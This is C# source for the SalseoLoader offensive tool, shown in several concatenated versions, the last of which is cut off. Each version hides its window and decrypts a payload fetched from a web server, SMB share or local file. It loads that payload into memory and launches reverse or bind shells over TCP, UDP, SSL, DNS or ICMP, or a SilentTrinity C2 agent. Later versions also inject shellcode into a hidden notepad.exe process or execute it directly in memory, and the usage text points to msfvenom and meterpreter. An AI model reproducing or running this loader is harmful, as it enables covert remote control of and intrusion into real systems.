static void Main(string[] args)
{
IntPtr h = Process.GetCurrentProcess().MainWindowHandle;
ShowWindow(h, 0);
string banner = @"
_____ ____ _ _____ ___ ___
/ ___/ / || | / ___/ / _] / \
( \_ | o || | ( \_ / [_ | |
\__ || || |___\__ || _]| O |
/ \ || _ || / \ || [_ | |
\ || | || \ || || |
\___||__|__||_____|\___||_____| \___/
_ ___ ____ ___ ___ ____
| | / \ / || \ / _]| \
| | | || o || \ / [_ | D )
| |___ | O || || D || _]| /
| || || _ || || [_ | \
| || || | || || || . \
|_____| \___/ |__|__||_____||_____||__|\_|
";
Console.ForegroundColor = ConsoleColor.Green;
Console.Write(banner);
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine(" By: CyberVaca@HackPlayers");
if (args.Length <= 3)
{
// Ayuda();
Console.ForegroundColor = ConsoleColor.Gray;
Console.WriteLine("[+] Usage:\n");
Console.WriteLine(" [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT");
Console.WriteLine(" [-] SalseoLoader.exe password \\\\smbserver.com\\evil\\elfuckingmal.txt ReverseUDP LHOST LPORT");
Console.WriteLine(" [-] SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseICMP LHOST");
Console.WriteLine(" [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS");
Console.WriteLine(" [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT");
Console.WriteLine("\n[+] Shells availables:\n\n [-] ReverseTCP\n [-] ReverseUDP\n [-] ReverseDNS\n [-] ReverseICMP\n [-] BindTCP\n");
System.Environment.Exit(1);
}
//################### Parametros del Loader y comprobacion de los argumentos introducidos ###################
string Salseo_Encriptado = null;
string clave = args[0].ToString();
byte[] xKey = Encoding.ASCII.GetBytes(clave);
string Salseo_URL = args[1].ToString();
string funcion = args[2].ToString().ToLower();
if (funcion == "reversetcp")
{
if (args.Length < 5)
{
Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
}
}
if (funcion == "reverseudp")
{
if (args.Length < 5)
{
Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
}
}
if (funcion == "reversedns")
{
if (args.Length < 5)
{
Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1);
}
}
if (funcion == "reverseicmp")
{
if (args.Length < 4)
{
Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
}
}
if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp")
{
Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1);
}
Console.ForegroundColor = ConsoleColor.Gray;
if (args[1].ToString().Substring(0, 4).ToLower() == "http")
{
Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString());
}
if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\")
{
Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
{
Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
}
Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
}
if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\")
{
Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
{
Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
}
Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
}
//#############################################################
//####################### Cargando dll ########################
//#############################################################
string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);
byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado);
string clases = null;
Console.WriteLine("[+] Desencriptando el salseo.");
Assembly salsongo = Assembly.Load(Final_Payload);
Console.WriteLine("[+] Cargando la salsa en memoria.");
Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
foreach (Type infoass in salsongo.GetTypes())
{
var strclase = string.Format("{0}", infoass.Name); clases = strclase;
}
;
//Console.WriteLine("[+] Class de Assembly : " + clases);
//######################## Foreach de los metodos ####################
//#####################################################################
Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString());
Console.ForegroundColor = ConsoleColor.White;
//#############################################################
//########################### LLamada a funcion Reversa ########################
if (funcion == "reversetcp")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversetcp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reverseudp")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reverseudp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reversedns")
{
string LHOST = args[3].ToString();
string DNSServer = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + DNSServer };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversedns");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reverseicmp")
{
string LHOST = args[3].ToString();
string[] argumentos = new string[] { LHOST + " " };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reverseicmp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "bindtcp")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("bindtcp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
}
static void Main(string[] args)
{
IntPtr h = Process.GetCurrentProcess().MainWindowHandle;
ShowWindow(h, 0);
string banner = @"
_____ ____ _ _____ ___ ___
/ ___/ / || | / ___/ / _] / \
( \_ | o || | ( \_ / [_ | |
\__ || || |___\__ || _]| O |
/ \ || _ || / \ || [_ | |
\ || | || \ || || |
\___||__|__||_____|\___||_____| \___/
_ ___ ____ ___ ___ ____
| | / \ / || \ / _]| \
| | | || o || \ / [_ | D )
| |___ | O || || D || _]| /
| || || _ || || [_ | \
| || || | || || || . \
|_____| \___/ |__|__||_____||_____||__|\_| 2.0
";
Console.ForegroundColor = ConsoleColor.Green;
Console.Write(banner);
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine(" By: CyberVaca@HackPlayers");
if (args.Length <= 2)
{
string ayuda = @"
[+] Usage:
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
[-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
[-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
[-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode PID
[-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C
[+] Available Payloads:
[-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode
[-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity
";
// Ayuda();
Console.ForegroundColor = ConsoleColor.Gray;
Console.WriteLine(ayuda);
System.Environment.Exit(1);
}
//################### Parametros del Loader y comprobacion de los argumentos introducidos ###################
string Salseo_Encriptado = null;
string clave = args[0].ToString();
byte[] xKey = Encoding.ASCII.GetBytes(clave);
string Salseo_URL = args[1].ToString();
string funcion = args[2].ToString().ToLower();
if (funcion == "reversetcp" || funcion == "reversessl")
{
if (args.Length < 5)
{
Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
}
}
if (funcion == "reverseudp")
{
if (args.Length < 5)
{
Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
}
}
if (funcion == "reversedns")
{
if (args.Length < 5)
{
Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1);
}
}
if (funcion == "reverseicmp")
{
if (args.Length < 4)
{
Environment.Exit(1);
}
}
if (funcion == "shellcode")
{
if (args.Length < 2)
{
Environment.Exit(1);
}
}
if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp" & funcion != "reversessl" & funcion != "shellcode" & funcion != "silenttrinity")
{
Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1);
}
if (funcion == "silenttrinity")
{
if (args.Length < 3)
{
Environment.Exit(1);
}
}
Console.ForegroundColor = ConsoleColor.Gray;
if (args[1].ToString().Substring(0, 4).ToLower() == "http")
{
Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString());
}
if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\")
{
Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
{
Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
}
Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
}
if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\")
{
Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
{
Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
}
Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
}
//#############################################################
//####################### Cargando dll ########################
//#############################################################
string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);
byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado);
string clases = null;
Assembly salsongo = null;
if (funcion != "shellcode")
{
salsongo = Assembly.Load(Final_Payload);
Console.WriteLine("[+] Cargando la salsa en memoria.");
Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
foreach (Type infoass in salsongo.GetTypes())
{
var strclase = string.Format("{0}", infoass.Name); clases = strclase;
}
;
//######################## Foreach de los metodos ####################
//#####################################################################
//Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString());
//Console.ForegroundColor = ConsoleColor.White;
//#############################################################
}
//########################### LLamada a funcion SilentTrinity ########################
if (funcion == "silenttrinity")
{
string URLSILENT = args[3].ToString();
string[] argumentos = new string[] { URLSILENT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("lanza");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
//########################### LLamada a funcion Reversa ########################
if (funcion == "reversetcp")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversetcp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reversessl")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversessl");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reverseudp")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reverseudp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reversedns")
{
string LHOST = args[3].ToString();
string DNSServer = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + DNSServer };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversedns");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reverseicmp")
{
string LHOST = args[3].ToString();
string[] argumentos = new string[] { LHOST + " " };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reverseicmp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "bindtcp")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("bindtcp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "shellcode")
{
byte[] sc = Final_Payload;
if (args.Length == 4)
{
int pid = System.Convert.ToInt32(args[3].ToString());
SalsaInjector.CodeInject(pid, sc);
}
if (args.Length == 3)
{
Process proc = new Process();
Console.WriteLine("[+] Spawneando proceso notepad.exe");
proc.StartInfo.FileName = "C:\\WINDOWS\\SYSTEM32\\NOTEPAD.EXE";
proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
proc.Start();
int pid = proc.Id;
Console.WriteLine("[+] Proceso con pid " + pid);
SalsaInjector.CodeInject(pid, sc);
}
}
}
static void Main(string[] args)
{
IntPtr h = Process.GetCurrentProcess().MainWindowHandle;
ShowWindow(h, 0);
string banner = @"
_____ ____ _ _____ ___ ___
/ ___/ / || | / ___/ / _] / \
( \_ | o || | ( \_ / [_ | |
\__ || || |___\__ || _]| O |
/ \ || _ || / \ || [_ | |
\ || | || \ || || |
\___||__|__||_____|\___||_____| \___/
_ ___ ____ ___ ___ ____
| | / \ / || \ / _]| \
| | | || o || \ / [_ | D )
| |___ | O || || D || _]| /
| || || _ || || [_ | \
| || || | || || || . \
|_____| \___/ |__|__||_____||_____||__|\_|
";
Console.ForegroundColor = ConsoleColor.Green;
Console.Write(banner);
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine(" By: CyberVaca@HackPlayers");
if (args.Length <= 2)
{
string ayuda = @"
[+] Usage:
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
[-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
[-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
[-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C
[+] Available Payloads:
[-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode
[-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity
";
// Ayuda();
Console.ForegroundColor = ConsoleColor.Gray;
Console.WriteLine(ayuda);
System.Environment.Exit(1);
}
//################### Parametros del Loader y comprobacion de los argumentos introducidos ###################
string Salseo_Encriptado = null;
string clave = args[0].ToString();
byte[] xKey = Encoding.ASCII.GetBytes(clave);
string Salseo_URL = args[1].ToString();
string funcion = args[2].ToString().ToLower();
if (funcion == "reversetcp" || funcion == "reversessl")
{
if (args.Length < 5)
{
Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
}
}
if (funcion == "reverseudp")
{
if (args.Length < 5)
{
Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1);
}
}
if (funcion == "reversedns")
{
if (args.Length < 5)
{
Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1);
}
}
if (funcion == "reverseicmp")
{
if (args.Length < 4)
{
Environment.Exit(1);
}
}
if (funcion == "shellcode")
{
if (args.Length < 2)
{
Environment.Exit(1);
}
}
if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp" & funcion != "reversessl" & funcion != "shellcode" & funcion != "silenttrinity")
{
Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1);
}
if (funcion == "silenttrinity")
{
if (args.Length < 3)
{
Environment.Exit(1);
}
}
Console.ForegroundColor = ConsoleColor.Gray;
if (args[1].ToString().Substring(0, 4).ToLower() == "http")
{
Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString());
}
if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\")
{
Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
{
Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
}
Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
}
if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\")
{
Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
{
Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
}
Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString());
}
//#############################################################
//####################### Cargando dll ########################
//#############################################################
string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);
byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado);
string clases = null;
Assembly salsongo = null;
if (funcion != "shellcode")
{
salsongo = Assembly.Load(Final_Payload);
Console.WriteLine("[+] Cargando la salsa en memoria.");
Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
foreach (Type infoass in salsongo.GetTypes())
{
var strclase = string.Format("{0}", infoass.Name); clases = strclase;
}
;
//######################## Foreach de los metodos ####################
//#####################################################################
//Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString());
//Console.ForegroundColor = ConsoleColor.White;
//#############################################################
}
//########################### LLamada a funcion SilentTrinity ########################
if (funcion == "silenttrinity")
{
string URLSILENT = args[3].ToString();
string[] argumentos = new string[] { URLSILENT + " " };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("lanza");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
//########################### LLamada a funcion Reversa ########################
if (funcion == "reversetcp")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversetcp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reversessl")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversessl");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reverseudp")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reverseudp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reversedns")
{
string LHOST = args[3].ToString();
string DNSServer = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + DNSServer };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversedns");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reverseicmp")
{
string LHOST = args[3].ToString();
string[] argumentos = new string[] { LHOST + " " };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reverseicmp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "bindtcp")
{
string LHOST = args[3].ToString();
string LPORT = args[4].ToString();
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("bindtcp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "shellcode")
{
byte[] sc = Final_Payload;
IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: No se pudo asignar la memoria remota.");
Console.WriteLine("[+] Intentando cargar Shellcode");
try
{
Marshal.Copy(sc, 0, baseAddr, sc.Length);
ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));
del();
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
finally
{
VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
}
}
}
static void Main(string[] args)
{
IntPtr h = Process.GetCurrentProcess().MainWindowHandle;
ShowWindow(h, 0);
string banner = @"
_____ ____ _ _____ ___ ___
/ ___/ / || | / ___/ / _] / \
( \_ | o || | ( \_ / [_ | |
\__ || || |___\__ || _]| O |
/ \ || _ || / \ || [_ | |
\ || | || \ || || |
\___||__|__||_____|\___||_____| \___/
_ ___ ____ ___ ___ ____
| | / \ / || \ / _]| \
| | | || o || \ / [_ | D )
| |___ | O || || D || _]| /
| || || _ || || [_ | \
| || || | || || || . \
|_____| \___/ |__|__||_____||_____||__|\_|
";
Console.ForegroundColor = ConsoleColor.Green;
Console.Write(banner);
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine(" By: CyberVaca@HackPlayers");
string ayuda = @"
[+] Usage:
[-] SalseoStandalone.exe
[-] You need to have your mandanga.txt on the same folder!
[-] Serve your payload as you want! SMB, HTTP, Locally...
[-] Want a meterpreter shell? Create a raw payload with msfvenom,
encrypt it with encrypterassembly.py and use shellcode function.
[-] Mandanga.txt contents:
[-] Reverse TCP/UDP/SSL [-] Reverse ICMP [-] Reverse DNS
<password> <password> <password>
<path_to_elmal.txt> <path_to_elmal.txt> <path_to_elmal.txt>
reversetcp/udp/ssl reverseicmp reversedns
<LHOST> <LHOST> <LHOST>
<LPORT> <DNS Server>
[-] Bind TCP [-] SilentTrinity [-] Shellcode
<password> <password> <password>
<path_to_elmal.txt> <path_to_elmal.txt> <path_to_payload.txt>
bindtcp silenttrinity shellcode
<LHOST> <URL_to_C2C>
<LPORT>
[+] Available Payloads:
[-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode
[-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity
";
//################### Parametros del Loader y comprobacion de los argumentos introducidos ###################
//////////////////////STANDALONE VERSION
string file_name = ".\\mandanga.txt";
string clave = "";
string Salseo_URL = "";
string funcion = "";
string DNSServer = "";
string URLSILENT = "";
string LHOST = "";
string LPORT = "";
if (System.IO.File.Exists(file_name) == true)
{
System.IO.StreamReader objReader;
try
{
if (File.ReadLines(file_name).Count() < 3)
{
Console.WriteLine(ayuda); Environment.Exit(1);
}
objReader = new System.IO.StreamReader(file_name);
clave = objReader.ReadLine(); //Pass. ALways present.
Salseo_URL = objReader.ReadLine(); //elmal.txt or shellcode.txt. Always present.
funcion = objReader.ReadLine().ToLower(); //Chosen function. Always present.
Console.WriteLine("[+] Password: "******"shellcode")
{
Console.WriteLine("[+] Shellcode path: " + Salseo_URL);
}
else
{
Console.WriteLine("[+] Elmal.txt path: " + Salseo_URL);
}
Console.WriteLine("[+] Chosen Function: " + funcion);
if (funcion == "shellcode")
{
}
else if (funcion == "silenttrinity")
{
if (File.ReadLines(file_name).Count() < 4)
{
Console.WriteLine(ayuda); Environment.Exit(1);
}
URLSILENT = objReader.ReadLine(); //SilentTrinity URL.
Console.WriteLine("[+] SilentTrinity URL: " + URLSILENT);
}
else if (funcion == "icmp")
{
if (File.ReadLines(file_name).Count() < 4)
{
Console.WriteLine(ayuda); Environment.Exit(1);
}
LHOST = objReader.ReadLine(); //SilentTrinity URL.
Console.WriteLine("[+] SilentTrinity URL: " + LHOST);
}
else if (funcion == "serverdns")
{
//HOST + DNSserver for dns shells.
if (File.ReadLines(file_name).Count() < 5)
{
Console.WriteLine(ayuda); Environment.Exit(1);
}
LHOST = objReader.ReadLine();
DNSServer = objReader.ReadLine();
Console.WriteLine("IP: " + LHOST);
Console.WriteLine("Port: " + DNSServer);
}
else
{
//HOST + PORT for bind/reverse shells.
if (File.ReadLines(file_name).Count() < 5)
{
Console.WriteLine(ayuda); Environment.Exit(1);
}
LHOST = objReader.ReadLine();
LPORT = objReader.ReadLine();
Console.WriteLine("IP: " + LHOST);
Console.WriteLine("Port: " + LPORT);
}
objReader.Close();
}
catch (System.NullReferenceException e)
{
Console.WriteLine(e);
}
}
else
{
Console.WriteLine(ayuda); Console.WriteLine("[-] .\\mandanga.txt file does not exist."); Environment.Exit(1);
}
string Salseo_Encriptado = null;
byte[] xKey = Encoding.ASCII.GetBytes(clave);
Console.ForegroundColor = ConsoleColor.Gray;
if (Salseo_URL.Substring(0, 4).ToLower() == "http")
{
Salseo_Encriptado = ClienteWeb.LeePayload(Salseo_URL);
}
if (Salseo_URL.Substring(0, 2).ToLower() == "\\\\")
{
Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false)
{
Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
}
Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(Salseo_URL);
}
if (Salseo_URL.Substring(0, 4).ToLower() != "http" && Salseo_URL.Substring(0, 2).ToLower() != "\\\\")
{
Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false)
{
Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1);
}
Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(Salseo_URL);
}
//#############################################################
//####################### Cargando dll ########################
//#############################################################
string hexadecimal = Zipea.Descomprime(Salseo_Encriptado);
byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal);
byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado);
string clases = null;
Assembly salsongo = null;
if (funcion != "shellcode")
{
salsongo = Assembly.Load(Final_Payload);
Console.WriteLine("[+] Cargando la salsa en memoria.");
Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name);
foreach (Type infoass in salsongo.GetTypes())
{
var strclase = string.Format("{0}", infoass.Name); clases = strclase;
}
;
}
//########################### LLamada a funcion SilentTrinity ########################
if (funcion == "silenttrinity")
{
string[] argumentos = new string[] { URLSILENT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("lanza");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
//########################### LLamada a funcion Reversa ########################
if (funcion == "reversetcp")
{
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversetcp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reversessl")
{
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversessl");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reverseudp")
{
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reverseudp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reversedns")
{
string[] argumentos = new string[] { LHOST + " " + DNSServer };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reversedns");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "reverseicmp")
{
string[] argumentos = new string[] { LHOST + " " };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("reverseicmp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "bindtcp")
{
string[] argumentos = new string[] { LHOST + " " + LPORT };
Type myType = salsongo.GetTypes()[0];
MethodInfo Method = myType.GetMethod("bindtcp");
object myInstance = Activator.CreateInstance(myType);
Method.Invoke(myInstance, new object[] { argumentos });
}
if (funcion == "shellcode")
{
byte[] sc = Final_Payload;
IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
